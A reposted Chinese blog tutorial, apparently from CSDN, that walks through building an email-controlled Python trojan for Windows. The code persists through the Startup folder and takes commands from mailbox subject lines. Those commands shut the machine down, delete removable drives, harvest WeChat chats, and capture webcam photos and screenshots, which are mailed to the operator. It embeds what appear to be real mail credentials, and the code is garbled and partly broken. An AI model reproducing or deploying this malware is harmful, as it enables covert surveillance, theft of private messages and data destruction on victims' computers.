我的编程空间,编程开发者的网络收藏夹
学习永远不晚

python结合邮件制作木马程序

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

python结合邮件制作木马程序

新人的第一篇文章,求点赞支持

注意:文章仅用于学习,不可用于非法用途


1.载入库

使用的库比较多,具体用途就不说了

import emailimport email.headerimport imaplibfrom bs4 import BeautifulSoupimport osimport timeimport reimport tkinter.messageboxfrom tkinter import *import cv2from PIL import ImageGrabfrom email.mime.multipart import MIMEMultipartfrom email.mime.text import MIMETextfrom email.utils import formataddrimport smtplibfrom email.mime.image import MIMEImageimport win32apiimport win32conimport ctypesimport shutilimport tkinter as tkfrom tkinter import messagebox,ttk,filedialogimport smtplib,osfrom email.mime.application import MIMEApplicationfrom email.header import Headerfrom wxauto import *import smtplibimport psutilimport threadingimport socket

2.开机自启动

一个病毒想要让它长久运行下去,开机自启动是非常重要的部分,这个原理是将病毒移动到开机程序文件夹中

t = os.getcwd()+'\\'file_a_path = '病毒.exe' #exe后缀不能去掉file_b_path = 'system windows.exe'folder2_path = 'C:\\Users\\' + os.getlogin() +'\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'try:    shutil.move(t + file_a_path, folder2_path + file_b_path)except Exception as e:    print('error',e)

3.病毒向邮箱发送接受请求,并接收以及执行指令

while True:    time.sleep(10)    class IMAP:        def __init__(self):            self.user_id = ''  # 163邮箱地址            self.password = ''            self.imap_server = 'imap.163.com'         def login(self):            while True:                try:                    serv = imaplib.IMAP4_SSL(self.imap_server, 993)  # SSL加密                    print('imap4 服务器连接成功')                except Exception as e:                    print('imap4 服务器连接失败:', e)                    time.sleep(1)                 try:                    serv.login(self.user_id, self.password)                    print('imap4 登录成功')                    return serv                    break                except Exception as e:                    print('imap4 登录失败:', e)                    time.sleep(1)         def loginout(self, conn):            conn.close            conn.logout()         def get_content(self, conn):            conn.select()            ret, data = conn.search(None, 'ALL')  # 所有邮件            email_list = data[0].split()            if len(email_list) == 0:                print('收件箱为空')            item = email_list[len(email_list) - 1]            ret, data = conn.fetch(item, '(RFC822)')            msg = email.message_from_string(data[0][1].decode('gbk'))            sub = msg.get('subject')            email_from = msg.get('from')            email_to = msg.get('to')            sub_text = email.header.decode_header(sub)            email_from_text = email.header.decode_header(email_from)            email_to_text = email.header.decode_header(email_to)            if sub_text[0]:                sub_detail = self.tuple_to_str(sub_text[0])            email_from_detail = ''            for i in range(len(email_from_text)):                email_from_detail = email_from_detail + self.tuple_to_str(email_from_text[i])            email_to_detail = ''            for i in range(len(email_to_text)):                email_to_detail = email_to_detail + self.tuple_to_str(email_to_text[i])             print('主题:', sub_detail)            print('发件人:', email_from_detail)            print('收件人:', email_to_detail)            b= ['9527']            for i in b:                if i in sub_detail:                    if ae==Flase:                        ae=True                        t= re.findall('[\u3002\uff1b\uff0c\uff1a\u201c\u201d\uff08\uff09\u3001\uff1f\u300a\u300b\u4e00-\u9fa5]',sub_detail)                        root=Tk()                        root.title(t)                        root['width']=400                        root['height']=30                        root.after (10000, root.destroy)                        root.mainloop()            c= ['2795']            for i in c:                if i in sub_detail:                    if af==Flase:                        af=True                        t= re.findall('[\u3002\uff1b\uff0c\uff1a\u201c\u201d\uff08\uff09\u3001\uff1f\u300a\u300b\u4e00-\u9fa5]',sub_detail)                        window.title(t)                        window = Tk()                        window.title(t)                        window.geometry('500x100')                        name_input = Text(window,width='40',height='3')                        name_input.pack()                        def print_name():message = MIMEText('content','plain','utf-8')message['Subject'] = name_input.get()message['From'] = sender message['To'] = receivers[0]  try:    smtpObj = smtplib.SMTP()     smtpObj.connect(mail_host,25)    smtpObj.login(mail_user,mail_pass)     smtpObj.sendmail(        sender,receivers,message.as_string())     smtpObj.quit()     print('success')except smtplib.SMTPException as e:    print('error',e) #打印错误Button(window,text='发送',command=print_name).pack()root.after (100000, root.destroy)window.mainloop()            if sub_detail=='关闭':                if ag==Flase:                    ag=True                    os.system('shutdown -s -t 00')            if sub_detail=='删除U盘':                if ah==Flase:                    ah=True                    def run():                        for i in range(100):time.sleep(3)for item in psutil.disk_partitions():    if "removable" in item.opts:        try:            os.remove('E:/')            os.remove('F:/')            os.remove('G:/')            os.remove('H:/')        except Exception as e:            print('0')                    if __name__ == "__main__":                        run()            if sub_detail=='查看微信':                if ai==Flase:                    ai=True                    wx.ChatWith(who)                    msgs = wx.GetAllMessage                    while msgs[0][0] == '查看更多消息':                        wx.LoadMoreMessage(1)                        msgs = wx.GetAllMessage                        print(f'总共有{len(msgs)}条')                        with open('369.txt', 'w', encoding='utf=8') as file:                        for msg in msgs:file.write('%s : %s\n' % (msg[0], msg[1]))                    print(f'总共有{len(msgs)}条')                    message = MIMEMultipart()                    message['From'] = sender                    message['To'] = receivers[0]                    message['Subject'] = 'title'#设置txt参数                    part2 = MIMEText(content2,'plain','utf-8')#附件设置内容类型,方便起见,设置为二进制流                    part2['Content-Type'] = 'application/octet-stream'#设置附件头,添加文件名                    part2['Content-Disposition'] = 'attachment;filename="369.txt"'#添加照片附件#将内容附加到邮件主体中                    message.attach(part2)#登录并发送                    try:                        smtpObj = smtplib.SMTP()                        smtpObj.connect(mail_host,25)                        smtpObj.login(mail_user,mail_pass)                        smtpObj.sendmail(                        sender,receivers,message.as_string())                        print('success')                        smtpObj.quit()                    except smtplib.SMTPException as e:                        print('error',e)                    os.remove("369.txt")            if sub_detail=='继续':                ae=Flase                af=Flase                ag=Flase                ah=Flase                ai=Flase                aj=Flase            if sub_detail=='观察':                if aj==Flase:                    aj=True                    def get_photo():                        cap = cv2.VideoCapture(0)  # 开启摄像头                        while True:f, frame = cap.read()  # 将摄像头中的一帧图片数据保存cv2.imwrite('14.png', frame)  # 将图片保存为本地文件cv2.waitKey(25)cap.release()  # 关闭摄像头break                    if __name__ == '__main__':                        get_photo()                    mail_host = 'smtp.163.com'                    mail_user = 'kety5288'                    mail_pass = 'KTLTMZQIMVFKUXPI'                    sender = 'kety5288@163.com'                    receivers = ['zqw13564153472@outlook.com']                    message = MIMEMultipart()                    message['From'] = sender                    message['To'] = receivers[0]                    message['Subject'] = '照片'                    with open('14.png','rb')as fp:                        picture = MIMEImage(fp.read())                        picture['Content-Type'] = 'application/octet-stream'                        picture['Content-Disposition'] = 'attachment;filename="14.png"'                    message.attach(picture)                    try:                        smtpObj = smtplib.SMTP()                        smtpObj.connect(mail_host,25)                        smtpObj = smtplib.SMTP_SSL(mail_host)                        smtpObj.login(mail_user,mail_pass)                        smtpObj.sendmail(sender,receivers,message.as_string())                        smtpObj.quit()                    except smtplib.SMTPException as e:                        print('error',e)                    os.remove("14.png")                    im = ImageGrab.grab()                    im.save('13.png')                    message = MIMEMultipart()                    message['From'] = sender                    message['To'] = receivers[0]                    message['Subject'] = '屏幕'                    with open('13.png','rb')as fp:                        picture = MIMEImage(fp.read())                        picture['Content-Type'] = 'application/octet-stream'                        picture['Content-Disposition'] = 'attachment;filename="13.png"'                    message.attach(picture)                    try:                        smtpObj = smtplib.SMTP()                        smtpObj.connect(mail_host,25)                        smtpObj = smtplib.SMTP_SSL(mail_host)                        smtpObj.login(mail_user,mail_pass)                        smtpObj.sendmail(sender,receivers,message.as_string())                        smtpObj.quit()                    except smtplib.SMTPException as e:                        print('error',e)                    os.remove("13.png")    if __name__ == '__main__':        IMAP = IMAP()        conn = IMAP.login()        IMAP.front(conn)        IMAP.get_content(conn)        IMAP.loginout(conn)

4.使用说明

需要自己添加邮箱和授权码,指令是要发在标题处的

5.总结

以上代码就是木马程序的核心,可以继续添加功能,但万不可做违法的事,下一期是一个炫酷的病毒控制端

来源地址:https://blog.csdn.net/2301_79455688/article/details/132379482

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

python结合邮件制作木马程序

下载Word文档到电脑,方便收藏和打印~

下载Word文档

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录